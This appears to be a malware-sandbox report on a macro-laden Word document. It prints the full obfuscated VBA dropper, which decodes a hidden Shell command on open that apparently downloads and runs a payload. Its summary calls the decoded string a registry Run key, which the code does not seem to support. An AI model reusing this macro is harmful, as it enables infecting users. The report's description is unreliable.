MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
This OOXML document contains a VBA macro that executes upon opening. The macro uses the Shell function with obfuscated strings, likely to download and execute a second-stage payload. The obfuscated string decodes to 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy', indicating an attempt at persistence.
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELLVBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2110 bytes |
SHA-256: 0c2af4dc43460df020b4108ec8d8dd21b09a654f13c3aed9d54e9c96488fd72d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
CreateObject("Excel.Application").Wait (Now + TimeValue("00:00:01"))
Shell (nTAsTKFkducSzWPYLbSJfOHXlSLKIaDbvlGuMLZUPNKfPfHlvGjEblD("œ›£‘žŸ”‘˜˜Z‘¤‘LY‘¤‘�¡ •›šœ›˜•�¥LŽ¥œ�ŸŸLYƒLt•��‘šLY�›™™�š�LTš‘£Y›Ž–‘� L ¥Ÿ ‘™Zz‘ Zƒ‘Žo˜•‘š UZp›£š˜›��r•˜‘TS” œŸf[[ •š¥¡ž˜Z�›™[¥cdbœ¦¥¢SXP‘š¢f€‘™œWSˆr•˜‘š�™‘Z‘¤‘SU"))
CreateObject("Excel.Application").Wait (Now + TimeValue("00:00:10"))
asd = Environ(nTAsTKFkducSzWPYLbSJfOHXlSLKIaDbvlGuMLZUPNKfPfHlvGjEblD("€‘™œ"))
Shell (asd + "\" + nTAsTKFkducSzWPYLbSJfOHXlSLKIaDbvlGuMLZUPNKfPfHlvGjEblD("r•˜‘š�™‘Z‘¤‘"))
End Sub
Public Function nTAsTKFkducSzWPYLbSJfOHXlSLKIaDbvlGuMLZUPNKfPfHlvGjEblD(YhdGBzvxXrBsOPUMzCxuRZbcFgvPCMTUKhCNEEtqUlHnOIsVaujXeMm As String)
Dim fMKPBSrwWMVYAqpEYGEsqKCFeUfHOMEMFWuCnTbxjhdMKRPicvfLhjr As Integer, VJZkCnkDKIIozvnmZAHJICLuNExzSgOAVzusNiYKUynEXxlmpeaLZvi As Integer
fMKPBSrwWMVYAqpEYGEsqKCFeUfHOMEMFWuCnTbxjhdMKRPicvfLhjr = 44
For VJZkCnkDKIIozvnmZAHJICLuNExzSgOAVzusNiYKUynEXxlmpeaLZvi = 1 To Len(YhdGBzvxXrBsOPUMzCxuRZbcFgvPCMTUKhCNEEtqUlHnOIsVaujXeMm)
Mid(YhdGBzvxXrBsOPUMzCxuRZbcFgvPCMTUKhCNEEtqUlHnOIsVaujXeMm, VJZkCnkDKIIozvnmZAHJICLuNExzSgOAVzusNiYKUynEXxlmpeaLZvi, 1) = Chr(Asc(Mid(YhdGBzvxXrBsOPUMzCxuRZbcFgvPCMTUKhCNEEtqUlHnOIsVaujXeMm, VJZkCnkDKIIozvnmZAHJICLuNExzSgOAVzusNiYKUynEXxlmpeaLZvi, 1)) - fMKPBSrwWMVYAqpEYGEsqKCFeUfHOMEMFWuCnTbxjhdMKRPicvfLhjr)
Next VJZkCnkDKIIozvnmZAHJICLuNExzSgOAVzusNiYKUynEXxlmpeaLZvi
nTAsTKFkducSzWPYLbSJfOHXlSLKIaDbvlGuMLZUPNKfPfHlvGjEblD = YhdGBzvxXrBsOPUMzCxuRZbcFgvPCMTUKhCNEEtqUlHnOIsVaujXeMm
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 9216 bytes |
SHA-256: f1e8a9dbdba32f84e09ae797a5601a26cd9b61693e6a79ba92114b23048ba79a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.